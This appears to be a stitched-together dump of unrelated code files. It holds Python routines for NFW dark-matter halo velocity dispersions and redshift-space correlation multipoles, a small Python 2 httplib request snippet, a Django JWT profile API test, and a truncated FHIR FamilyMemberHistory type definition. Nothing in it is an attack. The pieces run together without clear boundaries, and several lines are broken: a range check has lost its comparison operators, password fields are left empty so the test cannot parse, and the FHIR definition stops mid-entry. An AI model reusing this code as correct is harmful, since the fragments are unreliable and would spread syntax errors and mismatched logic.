return rho(R), R in Mpc, rho in MSun pc^-2 """ R = np.array(R) # r could be r(r) or r(r, Mhalo) R = R.reshape(R.shape[0], R.size/R.shape[0]) Mhalo = np.array(Mhalo) c = fcorr*concentration(Mhalo, z, M_star) R_vir = virial_radius(Mhalo, z, CosPar) rhos = rho_s(c,z,CosPar,alpha) x = c*R/R_vir # cr/rvir(R, Mhalo) gc = 1./(np.log(1.+c)-c/(1.+c)) return circular_virial(Mhalo,z,CosPar)*(1.+x)*np.sqrt(0.5*x*c*gc*(np.pi**2-np.log(x)-1./x-1./(1.+x)**2-6./(1.+x)+(1.+1./x/x-4./x-2./(1.+x))*np.log(1.+x)+3.*pow(np.log(1.+x),2)+6.*spence(1.+x))) #return circular_virial(Mhalo,z,CosPar)*(1.+x)*np.sqrt(c*gc*(-np.pi**2/3.+1./2./(1.+x)**2+2./(1.+x)+np.log(1.+x)/x+np.log(1.+x)/(1.+x)-pow(np.log(1.+x),2)-2.*spence(1.+x))) #return circular_virial(Mhalo,z,CosPar)*(1.+x)*np.sqrt(c*gc/x*(np.pi**2/6.-1./2./(1.+x)**2-1./(1.+x)-np.log(1.+x)/(1.+x)+pow(np.log(1.+x),2)/2.+spence(1.+x))) def NFW_project_sigma(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_sigma(y0, Mhalo, z, CosPar, fcorr=1., alpha=1.) """ # Need to do some argumente/keyword checking bbeta = 0.0 R_min = 1E-5 R_max = 2E3 if min(y)R_max: raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) # Set up interpolation profiles dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) rhoR = NFW_profile(R, Mhalo, z, CosPar, fcorr, alpha)*NFW_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2 # sigma^2*rhoR(nR, nMhalo) Rout = 5. Rvir = virial_radius(Mhalo, z, CosPar).reshape(nMhalo) # Rvir(nMhalo) Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f = interpolate.interp1d(R[:,i], rhoR[:,i]) Sigma_integrand = lambda R, s: (1.-bbeta*s*s/R/R)*2.*f(R)*R**2/np.sqrt(R*R-s*s) # dlogR s_max = max(Rvir[i]*Rout, max(yy[:,i])*1.1) s_min = yy[:,i] for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min[j])+dlogs,np.log(s_max)+dlogs,dlogs)) nlogs = ss.size Integrand = Sigma_integrand(ss, s_min[j]) Sigma_y[j, i] = np.sum((Integrand[2:]+Integrand[:nlogs-2]+4.*Integrand[1:nlogs-1])/6.*dlogs)*1E6 Norm_Sigma_y = NFW_project_profile(y, Mhalo, z, CosPar, fcorr, alpha) return np.sqrt(Sigma_y/Norm_Sigma_y) # Premier for 2-halo term velocity correlation # Only vectorize in R2 #def sigma_j_R1_R2_integrand_unnorm(j, logk, R1, R2, z, CosPar): # kk = np.exp(logk) # Tk = kk**(3+2.*j)*ps.EH_TF_mpc(kk, z, CosPar) #/2./np.pi**2*(3E5/70.)**(3.95)*(1.95E-5*pow(0.27, -0.785-0.05*np.log(0.27))*np.exp(-1.14))**2 # kR1 = kk*(np.ones(R2.size)*R1.reshape(R1.size, 1)).reshape(R1.size, R2.size, 1) #Be careful with the broadcasting rules # kR2 = kk*(np.ones(R1.size)*R2.reshape(1, R2.size)).reshape(R1.size, R2.size, 1) #Be careful with the broadcasting rules # # Top-hat window function # WRK1 = 3./kR1**3*(np.sin(kR1)-kR1*np.cos(kR1)) # WRK2 = 3./kR2**3*(np.sin(kR2)-kR2*np.cos(kR2)) # return Tk*WRK1*WRK2 #def sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar): # """ # sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar): # """ # rr = np.array(r) # RR1 = np.array(R1) # RR2 = np.array(R2) # k_min = 1E-6 # k_max = 1E3 # dlogk = 1.E-2 # logk = np.arange(np.log(k_min),np.log(k_max)+2.*dlogk,dlogk) # nlogk = logk.size # # [nr, nR1, nR2, nk] # kr = 
np.exp(logk)*((rr.reshape(rr.size, 1)*np.ones(RR1.size)).reshape(rr.size, RR1.size, 1)*np.ones(RR2.size)).reshape(rr.size, RR1.size, RR2.size, 1) # KRK = (np.sin(kr)/kr)-(2./kr**3)*(np.sin(kr)-kr*np.cos(kr)) # Integrand = (sigma_j_R1_R2_integrand_unnorm(j, logk, RR1, RR2,z, CosPar)).reshape(1, RR1.size, RR2.size, nlogk)*KRK # # Compute the integral (Maybe a vectorized trapezoidal integral would be faster?) #print "Integrating..." # return np.sum((Integrand[:,1:]+Integrand[:,:nlogk-1])/2.*dlogk, axis=1) # return np.sum((Integrand[:,2:]+Integrand[:,:nlogk-2]+4.*Integrand[:,1:nlogk-1])/6.*dlogk, axis=1) def sigma_j_R1_R2_integrand_unnorm(j, logk, R1, R2, z, CosPar): kk = np.exp(logk) Tk = kk**(3+2.*j)*ps.EH_TF_mpc(kk, z, CosPar) #/2./np.pi**2*(3E5/70.)**(3.95)*(1.95E-5*pow(0.27, -0.785-0.05*np.log(0.27))*np.exp(-1.14))**2 kR1 = kk*R1 #Be careful with the broadcasting rules kR2 = kk*R2.reshape(R2.size, 1) #Be careful with the broadcasting rules # Top-hat window function WRK1 = (3./kR1**3*(np.sin(kR1)-kR1*np.cos(kR1))).reshape(1, kk.size) WRK2 = 3./kR2**3*(np.sin(kR2)-kR2*np.cos(kR2)) return Tk*WRK1*WRK2 def sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar, radial=False): """ sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar): """ rr = np.array(r) RR1 = np.array(R1) if RR1.size>1: raise ValueError("r and R1 should be scalar") RR2 = np.array(R2) k_min = 1E-6 k_max = 1E3 dlogk = 1.E-2 logk = np.arange(np.log(k_min),np.log(k_max)+2.*dlogk,dlogk) nlogk = logk.size # [nr, nR1, nR2, nk] kr = (np.exp(logk)).reshape(1, nlogk)*rr.reshape(rr.size, 1) if radial: KRK = (np.sin(kr)/kr)-(2./kr**3)*(np.sin(kr)-kr*np.cos(kr)) else: KRK = (np.sin(kr)/kr) # KRK = (1./kr**3)*(np.sin(kr)-kr*np.cos(kr)) Integrand = (sigma_j_R1_R2_integrand_unnorm(j, logk, R1, RR2, z, CosPar)).reshape(1, RR2.size, nlogk)*KRK.reshape(rr.size, 1, nlogk) # Compute the integral (Maybe a vectorized trapezoidal integral would be faster?) #print "Integrating..." # return np.sum((Integrand[:,1:]+Integrand[:,:nlogk-1])/2.*dlogk, axis=1) return np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogk-2]+4.*Integrand[:,:,1:nlogk-1])/6.*dlogk, axis=2) def sigma_j_r_R1_R2_sqr(j, r, R1, R2, z, CosPar, radial=False): srR12_sqr_unnormalized = sigma_j_r_R1_R2_sqr_unnorm(j, r, R1, R2, z, CosPar, radial=radial) s8_sqr = ps.sigma_R_sqr_unnorm(8./CosPar['h'], 0., CosPar) return srR12_sqr_unnormalized*CosPar['sigma_8']**2/s8_sqr # We only need to calculate it once ... def NFW_2h_sigma_nocorr(R0, Mhalo0, z, CosPar, mu=1., fcorr=1., alpha=1.): Mhalo = np.array(Mhalo0) nMhalo = Mhalo.size Mhalo = Mhalo.reshape(nMhalo) #if nMhalo>1: raise ValueError("Mhalo must be a scalar") R = np.array(R0) nR = R.size R = R.reshape(nR) RR = np.ones(nMhalo)*R.reshape(nR,1) sigma_halo = NFW_approx_sigma_halo(Mhalo, z, CosPar) bMhalo = bias(Mhalo, z, CosPar) # get \xi(R) no bias xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # Integration over all masses M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) dn_dlogM = halo_mass_function(MM, z, CosPar) bM = bias(MM, z, CosPar) nlogM = logM.size sigma_halo_MM = NFW_approx_sigma_halo(MM, z, CosPar) sigma_virial_MM = NFW_approx_sigma_virial(MM, z, CosPar)*np.sqrt(3.) 
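# Note: NFW_approx_sigma_virial appears to return a one-dimensional dispersion (see the
# "One dimensional virial motion?" comment above its definition), so the sqrt(3.) factor here
# promotes it to a 3-D dispersion before (mu*sigma_virial_MM)**2 is summed in quadrature with
# sigma_halo_MM**2 in the mass integrand below.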
# Use the approximation to speed things up Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*(sigma_halo_MM**2+(mu*sigma_virial_MM)**2)).reshape(1,1,nlogM)*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) sigma2_average = np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogM-2]+4.*Integrand[:,:,1:nlogM-1])/6.*dlogM, axis=2)#.reshape(nR, nMhalo) return np.sqrt((sigma_halo**2).reshape(1, nMhalo)+sigma2_average/(1.+bMhalo.reshape(1,nMhalo)*xiR)) def NFW_2h_sigma_allmass(R0, Mhalo0, z, CosPar, mu=1., fcorr=1., alpha=1.): Mhalo = np.array(Mhalo0) nMhalo = Mhalo.size Mhalo = Mhalo.reshape(nMhalo) #if nMhalo>1: raise ValueError("Mhalo must be a scalar") R = np.array(R0) nR = R.size R = R.reshape(nR) RR = np.ones(nMhalo)*R.reshape(nR,1) sigma_halo = NFW_approx_sigma_halo(Mhalo, z, CosPar) bMhalo = bias(Mhalo, z, CosPar) # get \xi(R) no bias xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # This is impossible # Integration over all masses M_min = 1E3 M_max = 1E17 dlogM = 1E-2 logM = np.arange(np.log(M_min)-2.*dlogM, np.log(M_max)+2.*dlogM, dlogM) MM = np.exp(logM) dn_dlogM = halo_mass_function(MM, z, CosPar) bM = bias(MM, z, CosPar) nlogM = logM.size sigma_halo_MM = NFW_approx_sigma_halo(MM, z, CosPar) sigma_virial_MM = NFW_approx_sigma_virial(MM, z, CosPar)*np.sqrt(3.) # Use the approximation to speed things up sigma_correlation_sqr = np.zeros(nR*nMhalo*nlogM).reshape(nR, nMhalo, nlogM) sigma_Mhalo_corr = np.sqrt(1.-sigma_j_M_sqr(0, Mhalo, z, CosPar)**2/sigma_j_M_sqr(1,Mhalo,z,CosPar)/sigma_j_M_sqr(-1,Mhalo,z,CosPar)) sigma_MM_corr = np.sqrt(1.-sigma_j_M_sqr(0, MM, z, CosPar)**2/sigma_j_M_sqr(1,MM,z,CosPar)/sigma_j_M_sqr(-1,MM,z,CosPar)) prefix = (100.*CosPar['h']*f_Legendre(0,CosPar))**2 for j in np.arange(nMhalo): sigma_correlation_sqr[:,j,:] = sigma_j_r_M1_M2_sqr(-1, R, Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr #for i in np.arange(nR): # sigma_correlation_sqr[i,j,:] = sigma_j_r_M1_M2_sqr(-1, R[i], Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr # print np.median(np.sqrt(sigma_correlation_sqr)) # Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*(sigma_halo_MM**2+(mu*sigma_virial_MM)**2)).reshape(1,1,nlogM)*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*((sigma_halo_MM**2+(mu*sigma_virial_MM)**2).reshape(1,1,nlogM)-2*sigma_correlation_sqr))*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) sigma2_average = np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogM-2]+4.*Integrand[:,:,1:nlogM-1])/6.*dlogM, axis=2)#.reshape(nR, nMhalo) return np.sqrt((sigma_halo**2).reshape(1, nMhalo)+sigma2_average/(1.+bMhalo.reshape(1,nMhalo)*xiR)) def NFW_2h_sigma(R0, Mhalo0, z, CosPar, mu=1., fcorr=1., alpha=1.): """ NFW_2h_sigma(R0, Mhalo0, z, CosPar, fcorr=1., alpha=1.): Use only 1E13 as a typical halo mass """ Mhalo = np.array(Mhalo0) nMhalo = Mhalo.size Mhalo = Mhalo.reshape(nMhalo) #if nMhalo>1: raise ValueError("Mhalo must be a scalar") R = np.array(R0) nR = R.size R = R.reshape(nR) RR = np.ones(nMhalo)*R.reshape(nR,1) # sigma_halo = NFW_approx_sigma_halo(Mhalo, z, CosPar) sigma_halo = NFW_sigma_halo(Mhalo, z, CosPar) bMhalo = bias(Mhalo, z, CosPar) # get \xi(R) no bias # xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # This is impossible # Integration over all masses # Choose one mass (1E13) for approximation MM = np.array([1E12]) nlogM = 
MM.size # sigma_halo_MM = NFW_approx_sigma_halo(MM, z, CosPar) sigma_halo_MM = NFW_sigma_halo(MM, z, CosPar) sigma_virial_MM = NFW_approx_sigma_virial(MM, z, CosPar)*np.sqrt(3.) # Use the approximation to speed things up sigma_correlation_sqr = np.zeros(nR*nMhalo*nlogM).reshape(nR, nMhalo, nlogM) sigma_Mhalo_corr = np.sqrt(1.-sigma_j_M_sqr(0, Mhalo, z, CosPar)**2/sigma_j_M_sqr(1,Mhalo,z,CosPar)/sigma_j_M_sqr(-1,Mhalo,z,CosPar)) sigma_MM_corr = np.sqrt(1.-sigma_j_M_sqr(0, MM, z, CosPar)**2/sigma_j_M_sqr(1,MM,z,CosPar)/sigma_j_M_sqr(-1,MM,z,CosPar)) prefix = (100.*CosPar['h']*f_Legendre(0,CosPar))**2 for j in np.arange(nMhalo): sigma_correlation_sqr[:,j,:] = sigma_j_r_M1_M2_sqr(-1, R, Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr #for i in np.arange(nR): # sigma_correlation_sqr[i,j,:] = sigma_j_r_M1_M2_sqr(-1, R[i], Mhalo[j], MM, z, CosPar)*prefix*sigma_Mhalo_corr[j]*sigma_MM_corr # Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*(sigma_halo_MM**2+ # (mu*sigma_virial_MM)**2)).reshape(1,1,nlogM)*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) # Integrand = (dn_dlogM*bM*MM/cosmo.rho_critical(z, CosPar)/cosmo.Omega_M_z(z, CosPar)*((sigma_halo_MM**2+ # (mu*sigma_virial_MM)**2).reshape(1,1,nlogM)-2*sigma_correlation_sqr))*(1.+bMhalo.reshape(1, nMhalo, 1)*bM.reshape(1,1,nlogM)*xiR.reshape(nR, nMhalo, 1)) # sigma2_average = np.sum((Integrand[:,:,2:]+Integrand[:,:,:nlogM-2]+4.*Integrand[:,:,1:nlogM-1])/6.*dlogM, axis=2)#.reshape(nR, nMhalo) sigma2_average = (sigma_halo**2).reshape(1,nMhalo)+(sigma_halo_MM**2).reshape(1,nMhalo)+((mu*sigma_virial_MM)**2).reshape(1,nMhalo)-2.*sigma_correlation_sqr.reshape(nR,nMhalo)*1. # print 'sigma_correlation_sqr: ', sigma_correlation_sqr.shape # print 'sigma2_average: ', sigma_correlation_sqr.shape # print 'sigma_halo_MM: ', sigma_halo_MM.shape # print sigma_halo_MM # print mu*sigma_virial_MM # print sigma_correlation_sqr return np.sqrt(sigma2_average) # return np.sqrt((sigma_halo**2).reshape(1,nMhalo)+(sigma_halo_MM**2).reshape(1,nMhalo)+((mu*sigma_virial_MM)**2).reshape(1,nMhalo)) def NFW_project_2h_sigma(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ NFW_project_2h_sigma(y, Mhalo, z, CosPar, fcorr=1., alpha=1.): """ # Need to do some argument/keyword checking bbeta = 0.0 R_min = 1E-5 R_max = 2E3 if min(y)<R_min: raise ValueError("y too small") if max(y)>(R_max/2.): raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) bMhalo = bias(Mhalo, z, CosPar) # Set up interpolation profiles dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) xiR = xi_2h_gal_dm(R, 1E13, z, CosPar) # no bias #rhoR = NFW_profile(R, Mhalo, z, CosPar, fcorr, alpha)*NFW_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2 # sigma^2*rhoR(nR, nMhalo) #rhoR = (1.+bMhalo*xiR)*NFW_2h_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2/3. # sigma^2*rhoR(nR, nMhalo) #Norm_rhoR = (1.+bMhalo*xiR) # sigma^2*rhoR(nR, nMhalo) rhoR = xiR*NFW_2h_sigma(R, Mhalo, z, CosPar, fcorr, alpha)**2/3.
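# Note on the projection below: Sigma_y is the line-of-sight (Abel-type) integral
#   Sigma(y) = 2 * int_y^{s_max} f(r) * r dr / sqrt(r^2 - y^2)
# evaluated in log radius, which is why Sigma_integrand carries an extra factor of R**2
# (r dr = r^2 dlogr) and is summed with Simpson weights over steps of dlogs; the
# (1.-bbeta*s*s/R/R) factor is a velocity-anisotropy weight (bbeta = 0.0 above), and the
# final sqrt(Sigma_y/Norm_Sigma_y) normalizes the sigma^2-weighted profile by its xiR weight.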
# sigma^2*rhoR(nR, nMhalo) Norm_rhoR = xiR # sigma^2*rhoR(nR, nMhalo) SS_max = R_max/2.0 Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) Norm_Sigma_y = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f = interpolate.interp1d(R[:,i], rhoR[:,i]) Norm_f = interpolate.interp1d(R[:,i], Norm_rhoR[:,i]) Sigma_integrand = lambda R, s: (1.-bbeta*s*s/R/R)*2.*f(R)*R**2/np.sqrt(R*R-s*s) # dlogR Norm_Sigma_integrand = lambda R, s: 2.*Norm_f(R)*R**2/np.sqrt(R*R-s*s) # dlogR # s_max = max(SS_max, max(yy[:,i])*1.1) s_max = SS_max s_min = yy[:,i] for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min[j])+dlogs,np.log(s_max)+dlogs,dlogs)) nlogs = ss.size Integrand = Sigma_integrand(ss, s_min[j]) Norm_Integrand = Norm_Sigma_integrand(ss, s_min[j]) Sigma_y[j, i] = np.sum((Integrand[2:]+Integrand[:nlogs-2]+4.*Integrand[1:nlogs-1])/6.*dlogs)*1E6 Norm_Sigma_y[j, i] = np.sum((Norm_Integrand[2:]+Norm_Integrand[:nlogs-2]+4.*Norm_Integrand[1:nlogs-1])/6.*dlogs)*1E6 return np.sqrt(Sigma_y/Norm_Sigma_y) def xi_Legendre_monopole(R, Mhalo, z, CosPar): """ xi_Legendre_monopole(R, Mhalo, z, CosPar): """ Mhalo = np.array(Mhalo) nMhalo = Mhalo.size bMhalo = bias(Mhalo, z, CosPar) f = f_Legendre(z, CosPar)/bMhalo coeff = 1.+2./3.*f+0.2*f**2 xi_R = xi_2h_gal_dm(R, Mhalo, z, CosPar) # no bias return coeff*xi_R*bMhalo.reshape(1,nMhalo) def xi_Legendre_multipole(y, Mhalo, z, CosPar): """ quadrupole, hexadecapole = xi_Legendre_multipole(R, Mhalo, z, CosPar): """ R_min = 1E-5 R_max = 2E3 if min(y)R_max: raise ValueError("y too large") y = np.array(y) y = y.reshape(y.shape[0], y.size/y.shape[0]) # Convert it to y(ny,1) or y(ny,nMhalo) ny = y.shape[0] Mhalo = np.array(Mhalo) nMhalo = Mhalo.size yy = np.ones(nMhalo)*y.reshape(ny,1) bMhalo = bias(Mhalo, z, CosPar) f = f_Legendre(z, CosPar)/bMhalo coeff_quadrupole = 4./3.*f+4./7.*f*f coeff_hexadecapole = 8./35.*f*f xi_y = xi_2h_gal_dm(y, Mhalo, z, CosPar) # no bias dlogR = 1E-2 R = np.exp(np.arange(np.log(R_min)-2.*dlogR, np.log(R_max)+2.*dlogR, dlogR)) nR = R.shape[0] R = np.ones(nMhalo)*R.reshape(nR, 1) # R(nR, nMhalo) xi_R = xi_2h_gal_dm(R, Mhalo, z, CosPar) # no bias xi_y_bar = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) xi_y_bar2 = np.zeros((ny, nMhalo)) # Initialize output: Sigma_y(ny, nMhalo) # Very difficult to vectorize without approximation # Let's settle for what we have now dlogs = 1E-3 # 10% better than 1E-2 for i in np.arange(nMhalo): f_interpol = interpolate.interp1d(R[:,i], xi_R[:,i]) xiy_qua_integrand = lambda R: f_interpol(R)*R**3 # dlogR xiy_hex_integrand = lambda R: f_interpol(R)*R**5 # dlogR s_max = yy[:,i] s_min = R_min for j in np.arange(ny): ss = np.exp(np.arange(np.log(s_min)+dlogs,np.log(s_max[j])+dlogs,dlogs)) nlogs = ss.size qua_Integrand = xiy_qua_integrand(ss) hex_Integrand = xiy_hex_integrand(ss) xi_y_bar[j, i] = np.sum((qua_Integrand[2:]+qua_Integrand[:nlogs-2]+4.*qua_Integrand[1:nlogs-1])/6.*dlogs)*3./s_max[j]**3 xi_y_bar2[j, i] = np.sum((hex_Integrand[2:]+hex_Integrand[:nlogs-2]+4.*hex_Integrand[1:nlogs-1])/6.*dlogs)*5/s_max[j]**5 # Calculate xiR_bar & xiR_bar2 xiR_quadrupole = coeff_quadrupole*(xi_y-xi_y_bar) xiR_hexadecapole = coeff_hexadecapole*(xi_y+2.5*xi_y_bar-3.5*xi_y_bar2) return xiR_quadrupole*bMhalo.reshape(1,nMhalo), xiR_hexadecapole*bMhalo.reshape(1,nMhalo) from httplib import HTTP req = HTTP("www.example.com") 
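# Compatibility note: httplib and its legacy HTTP class exist only under Python 2. A rough
# Python 3 equivalent of the request assembled below (a sketch, not part of the original
# snippet) would be:
#   from http.client import HTTPConnection
#   conn = HTTPConnection("www.example.com")
#   conn.request("GET", "/index.html", headers={"Accept": "text/html", "User-Agent": "MyPythonScript"})
#   resp = conn.getresponse()   # resp.status, resp.reason play the role of the (ec, em) pair below
#   textlines = resp.read()
#   conn.close()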
req.putrequest("GET", "/index.html") req.putheader("Accept", "text/html") req.putheader("User-Agent", "MyPythonScript") req.endheaders() ec, em, h = req.getreply() print(ec, em) # 200 OK fd = req.getfile() textlines = fd.read() fd.close()blargg/__init__.py default_app_config = 'blargg.apps.Blargg' __version__ = "0.7.0" veggieavocado/Woobaktests/django/test_profile_api.py from django.contrib.auth import get_user_model from django.test import TestCase from django.core.urlresolvers import reverse from rest_framework import status from rest_framework.test import APIClient from rest_framework_jwt import utils, views from rest_framework_jwt.compat import get_user_model from rest_framework_jwt.settings import api_settings, DEFAULTS import json, os from django.utils.encoding import smart_text from accounts.models import ( Profile ) User = get_user_model() class UserAPITestCase(TestCase): ''' User REST API testing module ''' def setUp(self): print('Starting User API test') self.client = APIClient(enforce_csrf_checks=True) self.username = 'lee' self.email = '' self.password = '' # create new user to send post requests self.user = { 'username': self.username, 'email': self.email, 'password': , } # 테스트영 user-data 생성 self.userdata = { 'username': self.username, 'password': , } response = self.client.post( '/api/accounts/user/', self.user, format='json' ) self.assertEqual(User.objects.all().count(), 1, msg='user data not created properly') self.assertEqual(response.status_code, status.HTTP_201_CREATED) self.assertEqual(User.objects.first().username, self.user['username']) self.assertEqual(User.objects.first().email, self.user['email']) def test_jwt_token(self): print('Strating JWT token test') testing = os.environ['TRAVIS'] if 'TRAVIS' in os.environ else 'False' if testing == 'True': assert 1 == 1 # 트레브시에서는 테스트 넘어가기 else: response = self.client.post( '/api/accounts/api-token-auth/', json.dumps(self.userdata), content_type='application/json' ) response_content = json.loads(smart_text(response.content)) decoded_payload = utils.jwt_decode_handler(response_content['token']) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(decoded_payload['username'], self.username) token = response.data['token'] # Get Test response = self.client.get( '/api/accounts/profile/', format='json', HTTP_AUTHORIZATION='JWT ' + token ) self.assertEqual(response.status_code, status.HTTP_200_OK) # Get Test without token response = self.client.get( '/api/accounts/profile/', format='json' ) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) user_orm = User.objects.get(username='lee') profile = Profile.objects.get(user=user_orm).user.username profile = { 'user': profile, 'name': 'Hoom', 'phone' : '01020003000', 'address': 'Seoul', } # put Test response = self.client.put( '/api/accounts/profile/lee/', profile, HTTP_AUTHORIZATION='JWT ' + token, format='json', ) data = response.json() self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(data['name'], 'Hoom') self.assertEqual(data['address'], 'Seoul') # Put Test without token response = self.client.put( '/api/accounts/profile/lee/', profile, format='json' ) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) # delete Test response = self.client.delete( '/api/accounts/user/lee/', HTTP_AUTHORIZATION='JWT ' + token, format='json', ) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) # deleteTest without token response = self.client.delete( '/api/accounts/profile/lee/', format='json' ) 
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) self.assertEqual(User.objects.all().count(), 0, msg='user data not delete properly') from typing import Any, List, Literal, TypedDict from .FHIR_Age import FHIR_Age from .FHIR_Annotation import FHIR_Annotation from .FHIR_boolean import FHIR_boolean from .FHIR_canonical import FHIR_canonical from .FHIR_code import FHIR_code from .FHIR_CodeableConcept import FHIR_CodeableConcept from .FHIR_dateTime import FHIR_dateTime from .FHIR_Element import FHIR_Element from .FHIR_FamilyMemberHistory_Condition import FHIR_FamilyMemberHistory_Condition from .FHIR_id import FHIR_id from .FHIR_Identifier import FHIR_Identifier from .FHIR_Meta import FHIR_Meta from .FHIR_Narrative import FHIR_Narrative from .FHIR_Period import FHIR_Period from .FHIR_Range import FHIR_Range from .FHIR_Reference import FHIR_Reference from .FHIR_string import FHIR_string from .FHIR_uri import FHIR_uri # Significant health conditions for a person related to the patient relevant in the context of care for the patient. FHIR_FamilyMemberHistory = TypedDict( "FHIR_FamilyMemberHistory", { # This is a FamilyMemberHistory resource "resourceType": Literal["FamilyMemberHistory"], # The logical id of the resource, as used in the URL for the resource. Once assigned, this value never changes. "id": FHIR_id, # The metadata about the resource. This is content that is maintained by the infrastructure. Changes to the content might not always be associated with version changes to the resource. "meta": FHIR_Meta, # A reference to a set of rules that were followed when the resource was constructed, and which must be understood when processing the content. Often, this is a reference to an implementation guide that defines the special rules along with other profiles etc. "implicitRules": FHIR_uri, # Extensions for implicitRules "_implicitRules": FHIR_Element, # The base language in which the resource is written. "language": FHIR_code, # Extensions for language "_language": FHIR_Element, # A human-readable narrative that contains a summary of the resource and can be used to represent the content of the resource to a human. The narrative need not encode all the structured data, but is required to contain sufficient detail to make it "clinically safe" for a human to just read the narrative. Resource definitions may define what content should be represented in the narrative to ensure clinical safety. "text": FHIR_Narrative, # These resources do not have an independent existence apart from the resource that contains them - they cannot be identified independently, and nor can they have their own independent transaction scope. "contained": List[Any], # May be used to represent additional information that is not part of the basic definition of the resource. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. Though any implementer can define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. "extension": List[Any], # May be used to represent additional information that is not part of the basic definition of the resource and that modifies the understanding of the element that contains it and/or the understanding of the containing element's descendants. Usually modifier elements provide negation or qualification. To make the use of extensions safe and manageable, there is a strict set of governance applied to the definition and use of extensions. 
Though any implementer is allowed to define an extension, there is a set of requirements that SHALL be met as part of the definition of the extension. Applications processing a resource are required to check for modifier extensions.Modifier extensions SHALL NOT change the meaning of any elements on Resource or DomainResource (including cannot change the meaning of modifierExtension itself). "modifierExtension": List[Any], # Business identifiers assigned to this family member history by the performer or other systems which remain constant as the resource is updated and propagates from server to server. "identifier": List[FHIR_Identifier], # The URL pointing to a FHIR-defined protocol, guideline, orderset or other definition that is adhered to in whole or in part by this FamilyMemberHistory. "instantiatesCanonical": List[FHIR_canonical], # The URL pointing to an externally maintained protocol, guideline, orderset or other definition that is adhered to in whole or in part by this FamilyMemberHistory. "instantiatesUri": List[FHIR_uri], # Extensions for instantiatesUri "_instantiatesUri": List[FHIR_Element], # A code specifying the status of the record of the family history of a specific family member. "status": Literal["partial", "completed", "entered-in-error", "health-unknown"], # Extensions for status "_status": FHIR_Element, # Describes why the family member's history is not available. "dataAbsentReason": FHIR_CodeableConcept, # The person who this history concerns. "patient": FHIR_Reference, # The date (and possibly time) when the family member history was recorded or last updated. "date": FHIR_dateTime, # Extensions for date "_date": FHIR_Element, # This will either be a name or a description; e.g. "", "my cousin with the red hair". "name": FHIR_string, # Extensions for name "_name": FHIR_Element, # The type of relationship this person has to the patient (father, mother, brother etc.). "relationship": 